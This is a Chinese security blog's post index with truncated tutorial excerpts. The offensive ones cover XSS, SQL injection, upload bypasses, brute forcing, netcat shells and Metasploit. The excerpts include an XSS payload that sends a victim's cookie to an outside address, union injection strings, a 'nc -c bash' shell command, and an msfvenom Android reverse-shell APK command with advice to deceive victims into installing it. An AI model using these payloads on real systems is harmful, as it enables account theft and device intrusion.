- 博客(17)
- 收藏
- 关注
RSS订阅转载 xss总结
xss总结1.常用payload1.//配合xss后台使用<script>document.location='http://127.0.0.1?cookie=' + document.cookie</script>或<img src=x onerror=a=document.cookie;document.location='http://192.168....
2020-01-30 12:45:50
320
原创 google-hacking
常用表达式“xxx” 查找一个短语AND +OR |NOT -intext:intext:“xxx” ——文档中包含xxx短语intitle:intitle:“xxx” ——标题中包含xxx短语intitle:“xxx"空格"yyy”——标题中包含xxx,其他任意位置包含yyy短语intitle:“xxx”“yyy” ——标题中包含xxx,且包含yyy短语i...
2019-10-25 16:38:38
615
原创 一次实战CTF-WEB(多重登录机制中的缺陷)
要求登录admin账号1.登录界面我们发现有找回密码这个易受攻击点2.直奔找回密码通过观察前两个阶段url(reset1.htm1 reset2.html),我们推测出了第三个阶段的url(reset3.html)第一阶段第二阶段第三阶段先在重设密码第一阶段输入admin,然后更改url直接绕过第二阶段邮箱验证,进入第三阶段设置新密码。此时,网站爆出系统错误,看来是不行了...
2019-10-25 16:33:35
355
原创 SQL注入手动
一 、字符型(需要闭合特意去 ’ ’ )【1】查当前库名?id=' union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA where '1'='1 或?id=' union select 1,2,database()-- 随便 --后面有个空格再随便输个字母。。。。。。...
2019-10-17 14:49:48
166
原创 文件上传漏洞
1.前端检测绕过【1】前端绕过,利用控制台同名函数覆盖文件检测函数2.MIME检测绕过【1】例如图片,则将brupsuite抓包修改Content-Type,例如图片mime为image/jepg3.apache漏洞【1】若上传php木马,则可将文件名改为xxx.php.rar因为apache无法解析.rar类型(也可将rar换为其他apache解析不了的类型),则会绕过rar解析ph...
2019-10-16 22:31:14
176
原创 python实现暴力破解
import urllib2import urllibimport cookielibimport threadingimport sysimport Queuefrom HTMLParser import HTMLParseruser_thread =10#这里登录名默认adminusername ="admin"#pass.txt中保存密码文本文件...
2019-10-16 22:12:27
2613
原创 结合python实现的netcat与python实现的tcp代理,建立一个流量隧道
在proxy中python2 proxy.py 127.0.0.1 3334 192.158.1.111 80 true作为服务器在本地3334端口进行监听,作为客户端连接远程web服务器192.158.1.111 80在netcat中(我们只用到了客户端)python2 netcat.py -t 127.0.0.1 -p 3334再在本地建立一个客户端,连接本地服务器,实现web...
2019-10-10 20:26:27
341
1
原创 python实现tcp代理
1.代理流程图2.实现代码#! usr/bin/python2import sysimport socketimport thread#handle local bufferdef request_handler(buffer): return buffer#handle remote bufferdef response_handler(buffer): r...
2019-10-10 10:47:31
272
原创 python实现netcat
#!/usr/bin/python2import sysimport socketimport getoptimport threadimport subprocesslisten =Falsecommand =Falseupload =Falseexecute =""tar...
2019-10-09 22:30:10
916
原创 python链接抓取工具
python实现自动抓取某站点内所有超链接(仅供学习使用)代码部分#!/usr/bin/pythonimport requestsimport timeimport reimport sys, getopt #命令行选项from bs4 import BeautifulSouplocaltime=time.strftime("%Y-%m-%d %H:%M:%S", time....
2019-09-22 23:29:04
182
原创 metasploit漏洞扫描
1.常用普通功能db_destory //删除数据库nc ip port //获取基本系统信息2.nexpose连接数据库load nexpose //载入nexpose插件msf > helpmsf > nexpose_connect -h //查看连接nexpose需要的参数msf >nexpose_connect 用户名:密码 ip地址 ok——...
2019-09-21 21:31:32
950
1
原创 metasploit情报收集
1.msf连接数据库service postgresql start(postgresql默认用户名scott,密码tiger)msf > db_connect 用户名:密码@127.0.0.1/msfbookmsf > helpmsf > db_status //状态是否连接msf > db_import //import filesmsf > db_h...
2019-09-21 21:02:06
138
原创 metasploit安卓木马
metasploit—安卓木马入侵(仅供学习使用,禁止非法使用)1.生成木马程序msfvenom -p android/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 R > 保存路径/文件名.apk这里我们使用了反射型tcp,让目标主机连接我们,有时攻击服务器时这种方法可以很好的绕过防火墙。2.想方设法欺骗对方安装木马app3.打开...
2019-09-21 19:55:56
1194
原创 二进制原码,补码,与无符号数
无符号数,2的补码,原码1. 无符号数例如:四位无符号数十进制:1 无符号数:0001十进制: 2 无符号数:00102. 原码(有符号数)最高位用于表示正负号,0表示正,1表示负。所以,表示正数时原码与无符号数相同。例如:四位数十进制:1原码:0001十进制:-1原码:1001十进制: 2原码:0010十进制: -2 原码:10103. 补码(方便计算)在...
2019-09-08 09:29:02
1044
原创 netcat瑞士军刀实现电脑远程控制termux
关于nc实现远程控制termux1.首先termux安装namppkg install namp2.windows系统安装netcat此为netcat下载连接下载得到zip压缩包,解压得到里面的exe文件将exe文件放在c盘用户文件夹里面最后打开windows命令行,输入nc相关的命令即可使用3.如何建立连接termux: nc -lp 333 -c bashwindows:...
2019-08-24 13:37:16
824
原创 免root xshell连接termux
免root实现xshell连接termuxtermux为安卓手机上的一款模拟linux终端的应用,由于手机上打字比较麻烦,所以想到了用电脑上的xshell通过ssh连接termux,以实现电脑控制termux。一.配置termux1.申请读写权限,以创建storage文件夹。$ termux-setup-storage$ lsstorage$ cd storage$ lsdcim...
2019-08-16 12:55:31
905
1
原创 各进制转换
各种进制之间的转换D表示十进制,B表示二进制,H表示十六进制。1.十进制转二进制例子: 45D 转为二进制45/2=22·····余122/2=11·····余011/2=5 ·····余15/2=2 ·····余12/2=1·······余01/2=0·······余1所以从下往上二进制为 101101B2.十进制转十六进制例子: 117D 转为十六进制117/...
2019-07-17 20:19:58
1768
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人